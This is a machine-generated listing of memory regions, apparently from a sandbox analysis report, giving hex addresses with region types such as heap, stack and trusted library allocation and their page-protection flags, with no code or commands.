page read and write
2800000
trusted library allocation
page read and write
3046000
heap
page read and write
346D000
trusted library allocation
page read and write
4B18000
trusted library allocation
page read and write
34C2000
trusted library allocation
page read and write
25E0000
trusted library allocation
page read and write
257000
heap
page read and write
69A000
heap
page read and write
2CDE000
trusted library allocation
page read and write
1B4000
heap
page read and write
30D0000
heap
page read and write
31B9000
trusted library allocation
page read and write
2C0000
heap
page read and write
10000
heap
page read and write
4784000
heap
page read and write
389000
heap
page read and write
2937000
trusted library allocation
page read and write
18F000
heap
page read and write
80BE000
trusted library allocation
page read and write
28F0000
trusted library allocation
page read and write
3663000
trusted library allocation
page read and write
1F30000
trusted library allocation
page read and write
474A000
heap
page read and write
1FC1000
trusted library allocation
page read and write
346D000
trusted library allocation
page read and write
12E91000
trusted library allocation
page read and write
5CA000
heap
page read and write
3498000
trusted library allocation
page read and write
2C0F000
trusted library allocation
page read and write
349B000
trusted library allocation
page read and write
1FC1000
trusted library allocation
page read and write
21E0000
heap
page read and write
4B30000
trusted library allocation
page read and write
383000
heap
page read and write
4B30000
trusted library allocation
page read and write
2370000
heap
page read and write
30D0000
heap
page read and write
12F70000
trusted library allocation
page read and write
1FC1000
trusted library allocation
page read and write
1FE4000
trusted library allocation
page read and write
34A1000
trusted library allocation
page read and write
2C08000
trusted library allocation
page read and write
72EA000
heap
page read and write
3072000
heap
page read and write
90DE000
trusted library allocation
page read and write
79A000
heap
page read and write
8C000
stack
page read and write
10057000
unkown
page read and write
360000
heap
page read and write
312B000
trusted library allocation
page read and write
4B30000
trusted library allocation
page read and write
3065000
trusted library allocation
page read and write
2820000
trusted library allocation
page read and write
10053000
unkown
page read and write
256000
stack
page read and write
1E0000
trusted library allocation
page read and write
2B1D000
trusted library allocation
page read and write
292D000
trusted library allocation
page read and write
1FE7000
trusted library allocation
page read and write
349D000
trusted library allocation
page read and write
34C2000
trusted library allocation
page read and write
1FA4000
trusted library allocation
page read and write
362000
heap
page read and write
120000
heap
page read and write
4B30000
trusted library allocation
page read and write
30DD000
trusted library allocation
page read and write
400000
heap
page read and write
1FE4000
trusted library allocation
page read and write
246E000
stack
page read and write
2493000
trusted library allocation
page read and write
4B18000
trusted library allocation
page read and write
1005A000
unkown
page readonly
1FE4000
trusted library allocation
page read and write
360E000
trusted library allocation
page read and write
2955000
trusted library allocation
page read and write
220000
heap
page read and write
2C56000
heap
page read and write
7FF00150000
trusted library allocation
page read and write
31E0000
trusted library allocation
page read and write
33E000
stack
page read and write
312B000
trusted library allocation
page read and write
2B1D000
trusted library allocation
page read and write
1FC8000
trusted library allocation
page read and write
2BF4000
trusted library allocation
page read and write
4B18000
trusted library allocation
page read and write
312B000
trusted library allocation
page read and write
28F0000
trusted library allocation
page read and write
8D0000
trusted library allocation
page read and write
4B30000
trusted library allocation
page read and write
2F70000
trusted library allocation
page read and write
1D5B000
heap
page read and write
7FF00160000
trusted library allocation
page execute and read and write
308D000
heap
page read and write
4B30000
trusted library allocation
page read and write
4B24000
trusted library allocation
page read and write
31E0000
trusted library allocation
page read and write
2230000
heap
page read and write
2430000
trusted library allocation
page read and write
2C08000
trusted library allocation
page read and write
2E20000
trusted library allocation
page read and write
2BFB000
trusted library allocation
page read and write
588000
heap
page read and write
292A000
trusted library allocation
page read and write
1BBA0000
heap
page read and write
34A1000
trusted library allocation
page read and write
754000
heap
page read and write
36B9000
trusted library allocation
page read and write
345A000
trusted library allocation
page read and write
2C03000
trusted library allocation
page read and write
292D000
trusted library allocation
page read and write
2B1D000
trusted library allocation
page read and write
2800000
trusted library allocation
page read and write
2BFC000
trusted library allocation
page read and write
3153000
trusted library allocation
page read and write
2937000
trusted library allocation
page read and write
2800000
trusted library allocation
page read and write
2C08000
trusted library allocation
page read and write
7FF000D2000
trusted library allocation
page execute and read and write
3052000
heap
page read and write
346D000
trusted library allocation
page read and write
2C8000
heap
page read and write
ACE000
stack
page read and write
1FC1000
trusted library allocation
page read and write
2DB0000
trusted library allocation
page read and write
1FA4000
trusted library allocation
page read and write
3624000
trusted library allocation
page read and write
313000
heap
page read and write
4D3000
trusted library allocation
page read and write
3AC000
heap
page read and write
292D000
trusted library allocation
page read and write
57A000
heap
page read and write
2C08000
trusted library allocation
page read and write
390000
heap
page read and write
8F4000
trusted library allocation
page read and write
30BA000
heap
page read and write
8F2E000
trusted library allocation
page read and write
4D0000
heap
page read and write
308D000
heap
page read and write
30D0000
heap
page read and write
25D0000
heap
page read and write
26E4000
trusted library allocation
page read and write
34BA000
trusted library allocation
page read and write
1FE4000
trusted library allocation
page read and write
2937000
trusted library allocation
page read and write
7FF001D0000
trusted library allocation
page execute and read and write
34CF000
trusted library allocation
page read and write
392000
heap
page read and write
1FE7000
trusted library allocation
page read and write
4D0000
heap
page read and write
EC000
stack
page read and write
203000
trusted library allocation
page read and write
12D21000
trusted library allocation
page read and write
30AC000
heap
page read and write
2D31000
trusted library allocation
page execute
2C08000
trusted library allocation
page read and write
3490000
trusted library allocation
page read and write
2B1D000
trusted library allocation
page read and write
1FE4000
trusted library allocation
page read and write
2B1D000
trusted library allocation
page read and write
730000
heap
page read and write
1FE4000
trusted library allocation
page read and write
1FE7000
trusted library allocation
page read and write
78B000
heap
page read and write
3493000
trusted library allocation
page read and write
10053000
unkown
page read and write
3492000
trusted library allocation
page read and write
2B1D000
trusted library allocation
page read and write
30D2000
heap
page read and write
30AF000
trusted library allocation
page read and write
2937000
trusted library allocation
page read and write
2938000
trusted library allocation
page read and write
2700000
heap
page read and write
4B18000
trusted library allocation
page read and write
4B24000
trusted library allocation
page read and write
2DB0000
trusted library allocation
page read and write
362000
heap
page read and write
A60000
trusted library allocation
page read and write
2C1B000
trusted library allocation
page read and write
913E000
trusted library allocation
page read and write
3079000
heap
page read and write
34B8000
trusted library allocation
page read and write
2955000
trusted library allocation
page read and write
294E000
stack
page read and write
312B000
trusted library allocation
page read and write
2800000
trusted library allocation
page read and write
1C8000
heap
page read and write
906E000
trusted library allocation
page read and write
1F11000
trusted library allocation
page read and write
573000
heap
page read and write
570000
heap
page read and write
1FE7000
trusted library allocation
page read and write
255000
stack
page read and write | page guard
A84000
trusted library allocation
page read and write
346D000
trusted library allocation
page read and write
3660000
trusted library allocation
page read and write
312B000
trusted library allocation
page read and write
23DF000
stack
page read and write
2C04000
trusted library allocation
page read and write
3A8000
heap
page read and write
37B000
heap
page read and write
668000
heap
page read and write
2930000
trusted library allocation
page read and write
359000
heap
page read and write
2C1B000
trusted library allocation
page read and write
7FF000EA000
trusted library allocation
page execute and read and write
2A1F000
stack
page read and write
305E000
heap
page read and write
354B000
trusted library allocation
page read and write
30BC000
heap
page read and write
1DC0000
heap
page execute and read and write
250000
heap
page read and write
2D3000
trusted library allocation
page read and write
C70000
heap
page read and write
3094000
heap
page read and write
4B18000
trusted library allocation
page read and write
302F000
heap
page read and write
34CF000
trusted library allocation
page read and write
197000
heap
page read and write
2494000
trusted library allocation
page read and write
4A75000
heap
page read and write
4B30000
trusted library allocation
page read and write
2941000
trusted library allocation
page read and write
275C000
stack
page read and write
2F80000
trusted library allocation
page read and write
292B000
trusted library allocation
page read and write
57A000
heap
page read and write
3499000
trusted library allocation
page read and write
1F94000
trusted library allocation
page read and write
346D000
trusted library allocation
page read and write
1FC1000
trusted library allocation
page read and write
2EF6000
trusted library allocation
page read and write
2C1B000
trusted library allocation
page read and write
34C2000
trusted library allocation
page read and write
25E0000
trusted library allocation
page read and write
54C000
heap
page read and write
4B24000
trusted library allocation
page read and write
30CD000
heap
page read and write
1FC8000
trusted library allocation
page read and write
7FF00290000
trusted library allocation
page execute and read and write
2CD000
heap
page read and write
570000
heap
page read and write
29BE000
stack
page read and write
2CDE000
trusted library allocation
page read and write
2800000
trusted library allocation
page read and write
2000000
trusted library allocation
page read and write
483000
trusted library allocation
page read and write
1F35000
trusted library allocation
page read and write
2840000
trusted library allocation
page read and write
48E000
stack
page read and write
1FC1000
trusted library allocation
page read and write
4D8000
heap
page read and write
30BA000
heap
page read and write
4510000
trusted library allocation
page read and write
390000
heap
page read and write
37A000
heap
page read and write
34B8000
trusted library allocation
page read and write
2C1D000
trusted library allocation
page read and write
5D4000
heap
page read and write
2360000
heap
page read and write
2CDE000
trusted library allocation
page read and write
257D000
stack
page read and write
4D8000
heap
page read and write
26C0000
trusted library allocation
page read and write
30CD000
heap
page read and write
14C000
stack
page read and write
4B30000
trusted library allocation
page read and write
7FF00020000
trusted library allocation
page read and write
346D000
trusted library allocation
page read and write
30B5000
heap
page read and write
2800000
trusted library allocation
page read and write
14A000
stack
page read and write
4B30000
trusted library allocation
page read and write
4B18000
trusted library allocation
page read and write
3B0000
heap
page read and write
10053000
unkown
page read and write
4B30000
trusted library allocation
page read and write
30C7000
heap
page read and write
2800000
trusted library allocation
page read and write
30FA000
trusted library allocation
page read and write
3097000
heap
page read and write
2FB3000
trusted library allocation
page read and write
4B24000
trusted library allocation
page read and write
1FE7000
trusted library allocation
page read and write
1FC1000
trusted library allocation
page read and write
2B1D000
trusted library allocation
page read and write
2333000
trusted library allocation
page read and write
2B0000
heap
page read and write
308D000
heap
page read and write
312B000
trusted library allocation
page read and write
730C000
heap
page read and write
2C1D000
trusted library allocation
page read and write
1CCD0000
heap
page read and write
8D9E000
trusted library allocation
page read and write
2590000
trusted library allocation
page read and write
4B30000
trusted library allocation
page read and write
30C3000
heap
page read and write
3C0000
heap
page read and write
380000
heap
page read and write
2D21000
trusted library allocation
page read and write
2931000
trusted library allocation
page read and write
4B30000
trusted library allocation
page read and write
3070000
heap
page read and write
10E000
heap
page read and write
346D000
trusted library allocation
page read and write
25A4000
trusted library allocation
page read and write
2CC000
stack
page read and write
2955000
trusted library allocation
page read and write
1FA4000
trusted library allocation
page read and write
2A90000
trusted library allocation
page read and write
292D000
trusted library allocation
page read and write
3091000
heap
page read and write
75D000
heap
page read and write
24B3000
trusted library allocation
page read and write
D0000
heap
page read and write
10046000
unkown
page readonly
2C08000
trusted library allocation
page read and write
2C1D000
trusted library allocation
page read and write
4B30000
trusted library allocation
page read and write
21A0000
heap
page read and write
637000
heap
page read and write
1FA4000
trusted library allocation
page read and write
2974000
trusted library allocation
page read and write
4B18000
trusted library allocation
page read and write
2310000
trusted library allocation
page read and write
2E20000
trusted library allocation
page read and write
28CE000
stack
page read and write
30C9000
heap
page read and write
2360000
heap
page read and write
238C000
stack
page read and write
30F4000
heap
page read and write
292E000
trusted library allocation
page read and write
2F70000
trusted library allocation
page read and write
6B4000
heap
page read and write
31BE000
trusted library allocation
page read and write
27FF000
stack
page read and write
2FA8000
trusted library allocation
page read and write
2C1D000
trusted library allocation
page read and write
2C08000
trusted library allocation
page read and write
2929000
trusted library allocation
page read and write
3640000
trusted library allocation
page read and write
2BF7000
trusted library allocation
page read and write
4B24000
trusted library allocation
page read and write
2C08000
trusted library allocation
page read and write
6FE000
heap
page read and write
18F000
heap
page read and write
30F4000
heap
page read and write
1B72000
trusted library section
page read and write
16D000
heap
page read and write
1BAFE000
stack
page read and write
35F8000
trusted library allocation
page read and write
6E7000
heap
page read and write
4B30000
trusted library allocation
page read and write
1FE7000
trusted library allocation
page read and write
758000
heap
page read and write
30F4000
heap
page read and write
230000
trusted library allocation
page read and write
4B30000
trusted library allocation
page read and write
254000
trusted library allocation
page read and write
2C08000
trusted library allocation
page read and write
8D0E000
trusted library allocation
page read and write
2CDE000
trusted library allocation
page read and write
398000
heap
page read and write
260000
heap
page read and write
1BA0000
heap
page read and write
1FC8000
trusted library allocation
page read and write
10053000
unkown
page read and write
2230000
trusted library allocation
page read and write
3660000
trusted library allocation
page read and write
2810000
trusted library allocation
page read and write
2860000
trusted library allocation
page read and write
2FF0000
trusted library allocation
page read and write
8FCE000
trusted library allocation
page read and write
7FF00260000
trusted library allocation
page read and write
2CDE000
trusted library allocation
page read and write
2973000
trusted library allocation
page read and write
925E000
trusted library allocation
page read and write
30E0000
heap
page read and write
1D20000
heap
page read and write
2C30000
trusted library allocation
page read and write
2EF4000
trusted library allocation
page read and write
4B30000
trusted library allocation
page read and write
2F8E000
trusted library allocation
page read and write
34A1000
trusted library allocation
page read and write
2955000
trusted library allocation
page read and write
2B1D000
trusted library allocation
page read and write
3ADC000
trusted library allocation
page read and write
1F08000
trusted library allocation
page read and write
2937000
trusted library allocation
page read and write
1FE4000
trusted library allocation
page read and write
34B8000
trusted library allocation
page read and write
3A7000
heap
page read and write
8D9E000
trusted library allocation
page read and write
7FF001C0000
trusted library allocation
page read and write
312B000
trusted library allocation
page read and write
476A000
heap
page read and write
3036000
heap
page read and write
2955000
trusted library allocation
page read and write
432000
heap
page read and write
30C4000
trusted library allocation
page read and write
2E20000
trusted library allocation
page read and write
1FC1000
trusted library allocation
page read and write
30CD000
heap
page read and write
4A70000
heap
page read and write
2929000
trusted library allocation
page read and write
1FE7000
trusted library allocation
page read and write
1FE7000
trusted library allocation
page read and write
3614000
trusted library allocation
page read and write
1FC1000
trusted library allocation
page read and write
2FF0000
trusted library allocation
page read and write
2D55000
trusted library allocation
page read and write
312B000
trusted library allocation
page read and write
3660000
trusted library allocation
page read and write
1F72000
trusted library allocation
page read and write
291B000
stack
page read and write
8D0E000
trusted library allocation
page read and write
360000
heap
page read and write
2BF8000
trusted library allocation
page read and write
2C1D000
trusted library allocation
page read and write
34A1000
trusted library allocation
page read and write
4771000
heap
page read and write
30D0000
heap
page read and write
10000000
unkown
page readonly
34A1000
trusted library allocation
page read and write
414000
heap
page read and write
727000
heap
page read and write
20E4000
heap
page read and write
308D000
heap
page read and write
3EC000
heap
page read and write
2353000
trusted library allocation
page read and write
2380000
trusted library allocation
page read and write
34A1000
trusted library allocation
page read and write
D8000
heap
page read and write
2580000
heap
page read and write
3093000
heap
page read and write
843E000
trusted library allocation
page read and write
10000
heap
page read and write
385B000
stack
page read and write
4B30000
trusted library allocation
page read and write
1D4000
trusted library allocation
page read and write
1FE7000
trusted library allocation
page read and write
4B30000
trusted library allocation
page read and write
30BB000
trusted library allocation
page read and write
312B000
trusted library allocation
page read and write
7FF00012000
trusted library allocation
page execute and read and write
2334000
trusted library allocation
page read and write
1FE4000
trusted library allocation
page read and write
E82E000
trusted library allocation
page read and write
30C7000
heap
page read and write
1FC8000
trusted library allocation
page read and write
588000
heap
page read and write
2275000
heap
page read and write
1005A000
unkown
page readonly
3241000
trusted library allocation
page read and write
302D000
heap
page read and write
473000
trusted library allocation
page read and write
2937000
trusted library allocation
page read and write
4B3000
trusted library allocation
page read and write
3497000
trusted library allocation
page read and write
4B30000
trusted library allocation
page read and write
380000
heap
page read and write
2FE9000
trusted library allocation
page read and write
24E0000
trusted library allocation
page read and write
1A0000
heap
page read and write
2F72000
trusted library allocation
page read and write
1B0000
heap
page read and write
3480000
heap
page read and write
281F000
stack
page read and write
88D0000
trusted library allocation
page read and write
3495000
trusted library allocation
page read and write
2FFE000
trusted library allocation
page read and write
1FC8000
trusted library allocation
page read and write
2E40000
trusted library allocation
page read and write
3002000
trusted library allocation
page read and write
584000
heap
page read and write
2FD0000
trusted library allocation
page read and write
3300000
trusted library allocation
page read and write
31E0000
trusted library allocation
page read and write
2B1D000
trusted library allocation
page read and write
4B18000
trusted library allocation
page read and write
34CF000
trusted library allocation
page read and write
2D34000
trusted library allocation
page execute
309B000
trusted library allocation
page read and write
3AC1000
trusted library allocation
page read and write
1B8000
heap
page read and write
68D000
heap
page read and write
30BA000
heap
page read and write
1FC8000
trusted library allocation
page read and write
40E000
heap
page read and write
31C000
heap
page read and write
303E000
trusted library allocation
page read and write
32C8000
trusted library allocation
page read and write
310E000
stack
page read and write
2A4C000
stack
page read and write
1FC1000
trusted library allocation
page read and write
30D2000
heap
page read and write
2800000
trusted library allocation
page read and write
30C9000
heap
page read and write
365000
heap
page read and write
1005A000
unkown
page readonly
510000
trusted library allocation
page read and write
54C000
heap
page read and write
585000
heap
page read and write
10000000
unkown
page readonly
2EF0000
trusted library allocation
page read and write
50F000
stack
page read and write
2955000
trusted library allocation
page read and write
2CDE000
trusted library allocation
page read and write
2BF5000
trusted library allocation
page read and write
34CF000
trusted library allocation
page read and write
2937000
trusted library allocation
page read and write
7FF00190000
trusted library allocation
page execute and read and write
312B000
trusted library allocation
page read and write
2923000
trusted library allocation
page read and write
1F94000
trusted library allocation
page read and write
28E0000
trusted library allocation
page read and write
2E0000
heap
page read and write
4770000
heap
page read and write
23E0000
heap
page read and write
1FC1000
trusted library allocation
page read and write
3EC000
heap
page read and write
1FC8000
trusted library allocation
page read and write
2860000
trusted library allocation
page read and write
80BE000
trusted library allocation
page read and write
1EF8000
trusted library allocation
page read and write
4B24000
trusted library allocation
page read and write
2843000
trusted library allocation
page read and write
204000
trusted library allocation
page read and write
3010000
heap
page read and write
3099000
heap
page read and write
346D000
trusted library allocation
page read and write
2B1D000
trusted library allocation
page read and write
301C000
heap
page read and write
2BF2000
trusted library allocation
page read and write
30C1000
trusted library allocation
page read and write
260000
heap
page read and write
7FF00280000
trusted library allocation
page execute and read and write
4B30000
trusted library allocation
page read and write
346D000
trusted library allocation
page read and write
28F0000
trusted library allocation
page read and write
2120000
heap
page read and write
6D7000
heap
page read and write
A50000
heap
page read and write
1D25000
heap
page read and write
1FE4000
trusted library allocation
page read and write
325E000
trusted library allocation
page read and write
230D000
stack
page read and write
2490000
trusted library allocation
page read and write
38BC000
trusted library allocation
page read and write
2800000
trusted library allocation
page read and write
30C3000
heap
page read and write
5C9000
heap
page read and write
225F000
trusted library allocation
page read and write
534000
trusted library allocation
page read and write
4B24000
trusted library allocation
page read and write
292D000
trusted library allocation
page read and write
3043000
trusted library allocation
page read and write
883E000
trusted library allocation
page read and write
362D000
trusted library allocation
page read and write
3107000
heap
page read and write
30B6000
heap
page read and write
2590000
trusted library allocation
page read and write
34A1000
trusted library allocation
page read and write
1FE7000
trusted library allocation
page read and write
2E44000
trusted library allocation
page read and write
1FA4000
trusted library allocation
page read and write
4510000
trusted library allocation
page read and write
3660000
trusted library allocation
page read and write
6E1000
heap
page read and write
1FE4000
trusted library allocation
page read and write
1FC8000
trusted library allocation
page read and write
292D000
trusted library allocation
page read and write
2800000
trusted library allocation
page read and write
30C7000
heap
page read and write
588000
heap
page read and write
34CF000
trusted library allocation
page read and write
3494000
trusted library allocation
page read and write
3B0000
heap
page read and write
2C1D000
trusted library allocation
page read and write
330000
heap
page read and write
2C08000
trusted library allocation
page read and write
10046000
unkown
page readonly
28D000
heap
page read and write
34C2000
trusted library allocation
page read and write
2250000
trusted library allocation
page read and write
34BA000
trusted library allocation
page read and write
28EE000
stack
page read and write
4784000
heap
page read and write
300C000
stack
page read and write
242F000
stack
page read and write
1FE4000
trusted library allocation
page read and write
1FC8000
trusted library allocation
page read and write
346D000
trusted library allocation
page read and write
4B30000
trusted library allocation
page read and write
400000
trusted library allocation
page read and write
869E000
trusted library allocation
page read and write
2B4000
trusted library allocation
page read and write
30C3000
trusted library allocation
page read and write
4B4000
trusted library allocation
page read and write
F0000
heap
page read and write
3130000
trusted library allocation
page read and write
5D4000
heap
page read and write
2160000
trusted library allocation
page read and write
34C2000
trusted library allocation
page read and write
3300000
trusted library allocation
page read and write
4786000
heap
page read and write
2FED000
trusted library allocation
page read and write
30B5000
trusted library allocation
page read and write
346D000
trusted library allocation
page read and write
1DD000
stack
page read and write
253000
trusted library allocation
page read and write
392000
heap
page read and write
3464000
trusted library allocation
page read and write
3069000
trusted library allocation
page read and write
350000
heap
page read and write
291E000
stack
page read and write
305E000
heap
page read and write
1FC8000
trusted library allocation
page read and write
7FF001E7000
trusted library allocation
page read and write
250E000
stack
page read and write
1FE7000
trusted library allocation
page read and write
2929000
trusted library allocation
page read and write
34C2000
trusted library allocation
page read and write
3032000
heap
page read and write
1005A000
unkown
page readonly
349A000
trusted library allocation
page read and write
4510000
trusted library allocation
page read and write
312B000
trusted library allocation
page read and write
1A3000
trusted library allocation
page read and write
363A000
trusted library allocation
page read and write
930000
heap
page read and write
346D000
trusted library allocation
page read and write
1AB000
stack
page read and write
10057000
unkown
page read and write
5A4000
heap
page read and write
10057000
unkown
page read and write
2980000
heap
page read and write
2C1B000
trusted library allocation
page read and write
3596000
trusted library allocation
page read and write
4B30000
trusted library allocation
page read and write
1FC8000
trusted library allocation
page read and write
404000
heap
page read and write
3E0000
heap
page read and write
3522000
trusted library allocation
page read and write
27E4000
trusted library section
page readonly
26E000
stack
page read and write
310E000
stack
page read and write
306E000
stack
page read and write
328A000
trusted library allocation
page read and write
399000
heap
page read and write
2C0E000
trusted library allocation
page read and write
1FC8000
trusted library allocation
page read and write
2B1D000
trusted library allocation
page read and write
2A2D000
stack
page read and write
76D000
heap
page read and write
30BE000
trusted library allocation
page read and write
2D33000
trusted library allocation
page execute
7FF00220000
trusted library allocation
page execute and read and write
293B000
trusted library allocation
page read and write
2420000
heap
page read and write
2520000
heap
page read and write
10000
heap
page read and write
1FE7000
trusted library allocation
page read and write
3027000
heap
page read and write
3650000
trusted library allocation
page read and write
30DF000
heap
page read and write
4B30000
trusted library allocation
page read and write
300F000
trusted library allocation
page read and write
30C9000
heap
page read and write
1FE7000
trusted library allocation
page read and write
10000
heap
page read and write
1FE4000
trusted library allocation
page read and write
2C08000
trusted library allocation
page read and write
2AA0000
heap
page execute and read and write
349E000
trusted library allocation
page read and write
312B000
trusted library allocation
page read and write
2BA000
heap
page read and write
30DA000
trusted library allocation
page read and write
34BA000
trusted library allocation
page read and write
350000
heap
page read and write
1B534000
heap
page read and write
3046000
heap
page read and write
4B18000
trusted library allocation
page read and write
1FE4000
trusted library allocation
page read and write
2274000
trusted library allocation
page read and write
2ED0000
trusted library allocation
page read and write
7FF0001A000
trusted library allocation
page execute and read and write
2B1D000
trusted library allocation
page read and write
913E000
trusted library allocation
page read and write
2B40000
remote allocation
page read and write
450F000
stack
page read and write
2C0C000
trusted library allocation
page read and write
2F70000
trusted library allocation
page read and write
4B24000
trusted library allocation
page read and write
4CE000
stack
page read and write
1FE4000
trusted library allocation
page read and write
293F000
trusted library allocation
page read and write
2937000
trusted library allocation
page read and write
1FE4000
trusted library allocation
page read and write
34CF000
trusted library allocation
page read and write
3300000
trusted library allocation
page read and write
2B1D000
trusted library allocation
page read and write
480000
heap
page read and write
34B8000
trusted library allocation
page read and write
1FC8000
trusted library allocation
page read and write
72EA000
heap
page read and write
4B24000
trusted library allocation
page read and write
30D2000
heap
page read and write
1CD000
heap
page read and write
869E000
trusted library allocation
page read and write
2B1D000
trusted library allocation
page read and write
2929000
trusted library allocation
page read and write
346D000
trusted library allocation
page read and write
36CE000
trusted library allocation
page read and write
565000
heap
page read and write
8ECE000
trusted library allocation
page read and write
5A4000
heap
page read and write
4B24000
trusted library allocation
page read and write
7FF0002C000
trusted library allocation
page execute and read and write
34BA000
trusted library allocation
page read and write
1FE7000
trusted library allocation
page read and write
30D0000
heap
page read and write
2E40000
trusted library allocation
page read and write
30CB000
heap
page read and write
1FC1000
trusted library allocation
page read and write
2B0000
trusted library allocation
page read and write
289E000
stack
page read and write
2C10000
heap
page read and write
1FE4000
trusted library allocation
page read and write
2FFE000
stack
page read and write
1FC8000
trusted library allocation
page read and write
392000
heap
page read and write
2270000
heap
page read and write
1FE4000
trusted library allocation
page read and write
3A0000
trusted library allocation
page read and write
10053000
unkown
page read and write
3032000
heap
page read and write
2937000
trusted library allocation
page read and write
84EE000
trusted library allocation
page read and write
2C1D000
trusted library allocation
page read and write
2C06000
trusted library allocation
page read and write
2CDE000
trusted library allocation
page read and write
10046000
unkown
page readonly
4B24000
trusted library allocation
page read and write
350000
heap
page read and write
3052000
heap
page read and write
5A4000
heap
page read and write
2800000
trusted library allocation
page read and write
4B24000
trusted library allocation
page read and write
4B18000
trusted library allocation
page read and write
30B8000
trusted library allocation
page read and write
24A0000
heap
page read and write
10000
heap
page read and write
7FF000E0000
trusted library allocation
page read and write
1FE7000
trusted library allocation
page read and write
1FC1000
trusted library allocation
page read and write
2160000
trusted library allocation
page read and write
2C1B000
trusted library allocation
page read and write
34A1000
trusted library allocation
page read and write
1FA4000
trusted library allocation
page read and write
2C50000
heap
page read and write
2DB0000
trusted library allocation
page read and write
4B30000
trusted library allocation
page read and write
1FE7000
trusted library allocation
page read and write
2800000
trusted library allocation
page read and write
4B18000
trusted library allocation
page read and write
2C08000
trusted library allocation
page read and write
10046000
unkown
page readonly
2FEE000
stack
page read and write
23D0000
heap
page read and write
3C0000
heap
page read and write
4E0000
heap
page read and write
302A000
heap
page read and write
1FC8000
trusted library allocation
page read and write
1FC1000
trusted library allocation
page read and write
2B3000
trusted library allocation
page read and write
2340000
heap
page read and write
1FE7000
trusted library allocation
page read and write
36C0000
heap
page read and write
3047000
trusted library allocation
page read and write
2920000
trusted library allocation
page read and write
4B18000
trusted library allocation
page read and write
308D000
heap
page read and write
34B8000
trusted library allocation
page read and write
301000
stack
page read and write
10057000
unkown
page read and write
1FE7000
trusted library allocation
page read and write
6D0000
heap
page read and write
3656000
trusted library allocation
page read and write
30C4000
heap
page read and write
364D000
trusted library allocation
page read and write
1FE7000
trusted library allocation
page read and write
180000
trusted library allocation
page read and write
1FE7000
trusted library allocation
page read and write
4B24000
trusted library allocation
page read and write
3627000
trusted library allocation
page read and write
4B30000
trusted library allocation
page read and write
389000
heap
page read and write
4B24000
trusted library allocation
page read and write
2937000
trusted library allocation
page read and write
10000
heap
page read and write
57A000
heap
page read and write
1FE7000
trusted library allocation
page read and write
1FC8000
trusted library allocation
page read and write
4C0000
heap
page read and write
708000
heap
page read and write
570000
heap
page read and write
28E0000
trusted library allocation
page read and write
1B593000
heap
page read and write
598000
heap
page read and write
10000000
unkown
page readonly
290000
heap
page read and write
24E0000
trusted library allocation
page read and write
36D000
heap
page read and write
4B30000
trusted library allocation
page read and write
2740000
trusted library allocation
page read and write
3496000
trusted library allocation
page read and write
2453000
trusted library allocation
page read and write
325B000
trusted library allocation
page read and write
12E31000
trusted library allocation
page read and write
72EA000
heap
page read and write
1FE4000
trusted library allocation
page read and write
34C2000
trusted library allocation
page read and write
312B000
trusted library allocation
page read and write
AA000
stack
page read and write
30B6000
heap
page read and write
1FA000
heap
page read and write
2BF0000
trusted library allocation
page read and write
2D0B000
trusted library allocation
page read and write
210000
trusted library allocation
page read and write
34A1000
trusted library allocation
page read and write
2955000
trusted library allocation
page read and write
346D000
trusted library allocation
page read and write
2F5C000
trusted library allocation
page read and write
2C08000
trusted library allocation
page read and write
346D000
trusted library allocation
page read and write
2C08000
trusted library allocation
page read and write
27B0000
trusted library allocation
page read and write
2800000
trusted library allocation
page read and write
346D000
trusted library allocation
page read and write
4740000
heap
page read and write
2B40000
remote allocation
page read and write
10057000
unkown
page read and write
2C1B000
trusted library allocation
page read and write
7FF001A0000
trusted library allocation
page read and write
83EE000
trusted library allocation
page read and write
4B30000
trusted library allocation
page read and write
4B24000
trusted library allocation
page read and write
2380000
trusted library allocation
page read and write
2BF6000
trusted library allocation
page read and write
2937000
trusted library allocation
page read and write
3107000
heap
page read and write
894000
trusted library allocation
page read and write
1FC8000
trusted library allocation
page read and write
1B551000
heap
page read and write
8F4E000
trusted library allocation
page read and write
10057000
unkown
page read and write
25A3000
trusted library allocation
page read and write
34CF000
trusted library allocation
page read and write
88CE000
stack
page read and write
309F000
trusted library allocation
page read and write
2C1B000
trusted library allocation
page read and write
3075000
heap
page read and write
1FA4000
trusted library allocation
page read and write
90DE000
trusted library allocation
page read and write
1FE7000
trusted library allocation
page read and write
10053000
unkown
page read and write
30F7000
heap
page read and write
54C000
heap
page read and write
10000000
unkown
page readonly
8F2E000
trusted library allocation
page read and write
3611000
trusted library allocation
page read and write
30D2000
heap
page read and write
2860000
trusted library allocation
page read and write
925E000
trusted library allocation
page read and write
2F94000
trusted library allocation
page read and write
2800000
trusted library allocation
page read and write
31E0000
trusted library allocation
page read and write
478C000
heap
page read and write
2F93000
trusted library allocation
page read and write
1F21000
trusted library allocation
page read and write
363000
heap
page read and write
1FC8000
trusted library allocation
page read and write
10046000
unkown
page readonly
2CDE000
trusted library allocation
page read and write
178000
heap
page read and write
870000
trusted library allocation
page read and write
6F4000
heap
page read and write
293D000
trusted library allocation
page read and write
1FE4000
trusted library allocation
page read and write
2490000
trusted library allocation
page read and write
B00000
heap
page read and write
3254000
trusted library allocation
page read and write
312B000
trusted library allocation
page read and write
293E000
trusted library allocation
page read and write
346D000
trusted library allocation
page read and write
34A1000
trusted library allocation
page read and write
1FE4000
trusted library allocation
page read and write
6BA000
heap
page read and write
293C000
trusted library allocation
page read and write
180000
heap
page read and write
1B0000
trusted library allocation
page read and write
260000
heap
page read and write
1B3F0000
heap
page read and write
4B24000
trusted library allocation
page read and write
7FFFFF10000
trusted library allocation
page execute and read and write
31FA000
trusted library allocation
page read and write
4B18000
trusted library allocation
page read and write
346D000
trusted library allocation
page read and write
308D000
trusted library allocation
page read and write
2844000
trusted library allocation
page read and write
363D000
trusted library allocation
page read and write
2100000
heap
page read and write
732D000
heap
page read and write
E82E000
trusted library allocation
page read and write
2FA000
heap
page read and write
2920000
trusted library allocation
page read and write
AC000
stack
page read and write
2934000
trusted library allocation
page read and write
348000
heap
page read and write
10000
heap
page read and write
2FA3000
trusted library allocation
page read and write
26E3000
trusted library allocation
page read and write
31DD000
trusted library allocation
page read and write
2FD0000
trusted library allocation
page read and write
84EE000
trusted library allocation
page read and write
346D000
trusted library allocation
page read and write
280000
heap
page read and write
34CF000
trusted library allocation
page read and write
1CB00000
heap
page read and write
3617000
trusted library allocation
page read and write
12D4C000
trusted library allocation
page read and write
1FE4000
trusted library allocation
page read and write
297000
heap
page read and write
853E000
trusted library allocation
page read and write
30B5000
heap
page read and write
2C08000
trusted library allocation
page read and write
4D0000
heap
page read and write
38B000
heap
page read and write
893000
trusted library allocation
page read and write
1FC1000
